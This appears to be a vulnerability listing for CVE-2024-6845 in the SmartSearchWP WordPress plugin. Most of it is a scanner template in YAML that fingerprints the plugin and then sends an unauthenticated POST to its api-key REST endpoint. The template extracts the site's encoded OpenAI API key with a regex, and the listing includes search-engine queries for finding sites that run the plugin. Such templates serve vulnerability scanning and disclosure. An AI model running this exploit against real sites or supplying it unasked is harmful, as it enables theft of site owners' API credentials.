漏洞描述
The plugin does not have proper authorization in one of its REST endpoint, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key.
CVE-2024-6845: SmartSearchWP < 2.4.6 - OpenAI Key Disclosure
PoC代码[已公开]
id: CVE-2024-6845
info:
name: SmartSearchWP < 2.4.6 - OpenAI Key Disclosure
author: s4e-io
severity: medium
description: |
The plugin does not have proper authorization in one of its REST endpoint, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key.
remediation: Fixed in 2.4.6
reference:
- https://wpscan.com/vulnerability/cfaaa843-d89e-42d4-90d9-988293499d26/
- https://nvd.nist.gov/vuln/detail/CVE-2024-6845
classification:
epss-score: 0.04282
epss-percentile: 0.88408
metadata:
max-request: 2
verified: true
vendor: webdigit
product: smartsearchwp
framework: wordpress
publicwww-query: "/wp-content/plugins/smartsearchwp"
fofa-query: body="/wp-content/plugins/smartsearchwp"
tags: cve,cve2024,exposure,wp,wordpress,wp-plugin,smartsearchwp
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"/wp-content/plugins/smartsearchwp")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-json/wdgpt/v1/api-key HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"key": "U2FsdGVkX1+X"}
matchers:
- type: dsl
dsl:
- 'contains(content_type,"application/json")'
- 'status_code == 200'
condition: and
extractors:
- type: regex
part: body
name: api-key
regex:
- '"([^"]+)"'
# digest: 4a0a0047304502206a838de13406edce51e0d648cbb1fcb04f50469ea6ebe7e1364e4cc8fda731de022100b223cfa5e1b472e40842cd6a1141106c67e57ce34b16bf0ee2bdc3d9c9dadfd9:922c64590222798bb761d5b6d8e72950